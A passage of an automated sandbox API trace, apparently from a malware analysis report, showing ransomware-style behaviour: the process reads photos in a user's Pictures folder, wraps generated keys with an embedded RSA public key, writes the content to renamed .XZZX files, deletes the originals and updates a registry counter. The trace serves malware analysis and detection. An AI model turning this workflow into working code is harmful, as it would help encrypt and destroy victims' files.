lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14aa3 [0125.048] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.048] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14aa8 [0125.048] SetErrorMode (uMode=0x1) returned 0x1 [0125.048] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.049] OutputDebugStringW (lpOutputString="end") [0125.049] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.049] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0125.049] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce2f40) returned 1 [0125.050] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2f40, dwCertEncodingType=0x1, pInfo=0x3cb2058*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb2088*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb2090*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddd18) returned 1 [0125.050] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.050] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.050] CryptEncrypt (in: hKey=0x3cddd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0125.050] CryptEncrypt (in: hKey=0x3cddd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2fc8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2fc8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0125.050] WriteFile (in: hFile=0x5f4, lpBuffer=0x3ce2fc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2fc8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0125.051] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.051] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.051] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0125.086] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.086] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5f0) returned 0x0 [0125.086] RegQueryValueExW (in: hKey=0x5f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x92, lpcbData=0x420dfdc*=0x4) returned 0x0 [0125.086] RegCloseKey (hKey=0x5f0) returned 0x0 [0125.086] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5f0) returned 0x0 [0125.087] RegSetValueExW (in: hKey=0x5f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x93, cbData=0x4 | out: lpData=0x420dfec*=0x93) returned 0x0 [0125.087] RegCloseKey (hKey=0x5f0) returned 0x0 [0125.087] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.087] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.088] CloseHandle (hObject=0x5f4) returned 1 [0125.089] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.090] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.090] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hl35zcYZE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hl35zcyze.bmp")) returned 1 [0125.092] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hl35zcYZE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hl35zcyze.bmp")) returned 0 Thread: id = 411 os_tid = 0x97c [0125.051] lstrcpyA (in: lpString1=0x435fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.051] lstrcpyW (in: lpString1=0x435f460, lpString2="Hx4D_z73m1pGCpzIPXzy.bmp" | out: lpString1="Hx4D_z73m1pGCpzIPXzy.bmp") returned="Hx4D_z73m1pGCpzIPXzy.bmp" [0125.051] lstrcpyW (in: lpString1=0x435e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.051] SetErrorMode (uMode=0x1) returned 0x1 [0125.052] lstrcpyW (in: lpString1=0x435f860, lpString2="Hx4D_z73m1pGCpzIPXzy.bmp" | out: lpString1="Hx4D_z73m1pGCpzIPXzy.bmp") returned="Hx4D_z73m1pGCpzIPXzy.bmp" [0125.052] CoCreateGuid (in: pguid=0x435e440 | out: pguid=0x435e440*(Data1=0x97cf4af0, Data2=0x480b, Data3=0x46ba, Data4=([0]=0x83, [1]=0x85, [2]=0xb5, [3]=0xf7, [4]=0x52, [5]=0x21, [6]=0x2d, [7]=0x63))) returned 0x0 [0125.052] wsprintfW (in: param_1=0x435ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hx4D_z73m1pGCpzIPXzy.bmp") returned 67 [0125.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x435fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.052] wsprintfW (in: param_1=0x435e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned 80 [0125.052] StrStrW (lpFirst="Hx4D_z73m1pGCpzIPXzy.bmp", lpSrch="XZZX") returned 0x0 [0125.052] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hx4D_z73m1pGCpzIPXzy.bmp", dwFileAttributes=0x20) returned 1 [0125.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hx4D_z73m1pGCpzIPXzy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hx4d_z73m1pgcpzipxzy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0125.053] ReadFile (in: hFile=0x5f0, lpBuffer=0x4360048, nNumberOfBytesToRead=0xb69f, lpNumberOfBytesRead=0x435e418, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesRead=0x435e418*=0xb69f, lpOverlapped=0x0) returned 1 [0125.054] CloseHandle (hObject=0x5f0) returned 1 [0125.054] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.054] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0125.055] SetErrorMode (uMode=0x1) returned 0x1 [0125.055] lstrcpyW (in: lpString1=0x435e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.055] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce3050) returned 1 [0125.058] CryptGenKey (in: hProv=0x3ce3050, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.202] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x435e41c | out: pbData=0x0*, pdwDataLen=0x435e41c*=0x94) returned 1 [0125.202] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x435e41c | out: pbData=0x40a0000*, pdwDataLen=0x435e41c*=0x94) returned 1 [0125.202] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.203] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.203] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.203] CryptReleaseContext (hProv=0x3ce3050, dwFlags=0x0) returned 1 [0125.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D2FBB85013E759FE97CF4AF0181D3E46.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d2fbb85013e759fe97cf4af0181d3e46.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0125.204] WriteFile (in: hFile=0x5f8, lpBuffer=0x4360048*, nNumberOfBytesToWrite=0xb69f, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesWritten=0x435e438*=0xb69f, lpOverlapped=0x0) returned 1 [0125.205] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb69f [0125.205] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.205] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6a4 [0125.205] WriteFile (in: hFile=0x5f8, lpBuffer=0x435f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x435f860*, lpNumberOfBytesWritten=0x435e438*=0x30, lpOverlapped=0x0) returned 1 [0125.205] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6d4 [0125.205] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.205] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6d9 [0125.205] SetErrorMode (uMode=0x1) returned 0x1 [0125.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.205] OutputDebugStringW (lpOutputString="end") [0125.206] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ5\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.206] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x435dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8 | out: pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8) returned 1 [0125.206] CryptAcquireContextW (in: phProv=0x435d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x435d3e4*=0x3ce3050) returned 1 [0125.206] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce3050, dwCertEncodingType=0x1, pInfo=0x3d0cec8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0cef8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0cf00*, PublicKey.cUnusedBits=0x0), phKey=0x435d3ec | out: phKey=0x435d3ec*=0x3cdddd8) returned 1 [0125.207] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.207] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.207] CryptEncrypt (in: hKey=0x3cdddd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x435d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x435d3f0*=0x80) returned 1 [0125.207] CryptEncrypt (in: hKey=0x3cdddd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce30d8*, pdwDataLen=0x435d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce30d8*, pdwDataLen=0x435d3e8*=0x80) returned 1 [0125.207] WriteFile (in: hFile=0x5f8, lpBuffer=0x3ce30d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce30d8*, lpNumberOfBytesWritten=0x435e438*=0x80, lpOverlapped=0x0) returned 1 [0125.207] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.208] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.208] GetUserNameW (in: lpBuffer=0x435e1f8, pcbBuffer=0x435dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x435dfe0) returned 1 [0125.208] wsprintfW (in: param_1=0x435dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.208] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe4 | out: phkResult=0x435dfe4*=0x5f4) returned 0x0 [0125.208] RegQueryValueExW (in: hKey=0x5f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x435dfd8, lpData=0x435dfec, lpcbData=0x435dfdc*=0x4 | out: lpType=0x435dfd8*=0x4, lpData=0x435dfec*=0x93, lpcbData=0x435dfdc*=0x4) returned 0x0 [0125.208] RegCloseKey (hKey=0x5f4) returned 0x0 [0125.208] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe8 | out: phkResult=0x435dfe8*=0x5f4) returned 0x0 [0125.208] RegSetValueExW (in: hKey=0x5f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x435dfec*=0x94, cbData=0x4 | out: lpData=0x435dfec*=0x94) returned 0x0 [0125.208] RegCloseKey (hKey=0x5f4) returned 0x0 [0125.208] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.209] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.209] CloseHandle (hObject=0x5f8) returned 1 [0125.210] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.211] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hx4D_z73m1pGCpzIPXzy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hx4d_z73m1pgcpzipxzy.bmp")) returned 1 [0125.212] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hx4D_z73m1pGCpzIPXzy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hx4d_z73m1pgcpzipxzy.bmp")) returned 0 Thread: id = 412 os_tid = 0x980 [0125.213] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.213] lstrcpyW (in: lpString1=0x420f460, lpString2="k3NI.jpg" | out: lpString1="k3NI.jpg") returned="k3NI.jpg" [0125.213] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.213] SetErrorMode (uMode=0x1) returned 0x1 [0125.213] lstrcpyW (in: lpString1=0x420f860, lpString2="k3NI.jpg" | out: lpString1="k3NI.jpg") returned="k3NI.jpg" [0125.213] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9f720f0b, Data2=0x6ade, Data3=0x402e, Data4=([0]=0x9f, [1]=0x6f, [2]=0x56, [3]=0xb9, [4]=0xfb, [5]=0x71, [6]=0x20, [7]=0x87))) returned 0x0 [0125.213] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3NI.jpg") returned 51 [0125.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.213] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned 80 [0125.213] StrStrW (lpFirst="k3NI.jpg", lpSrch="XZZX") returned 0x0 [0125.213] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3NI.jpg", dwFileAttributes=0x20) returned 1 [0125.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3NI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k3ni.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0125.214] ReadFile (in: hFile=0x5fc, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xe69e, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0xe69e, lpOverlapped=0x0) returned 1 [0125.215] CloseHandle (hObject=0x5fc) returned 1 [0125.215] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.216] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0125.216] SetErrorMode (uMode=0x1) returned 0x1 [0125.216] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.216] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce3160) returned 1 [0125.219] CryptGenKey (in: hProv=0x3ce3160, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.331] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.331] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x420e41c | out: pbData=0x40a0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.331] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.332] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.332] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.332] CryptReleaseContext (hProv=0x3ce3160, dwFlags=0x0) returned 1 [0125.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7f23998a1acab3e49f720f0b1eeb982c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0125.332] WriteFile (in: hFile=0x5fc, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xe69e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0xe69e, lpOverlapped=0x0) returned 1 [0125.333] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe69e [0125.333] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.333] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe6a3 [0125.333] WriteFile (in: hFile=0x5fc, 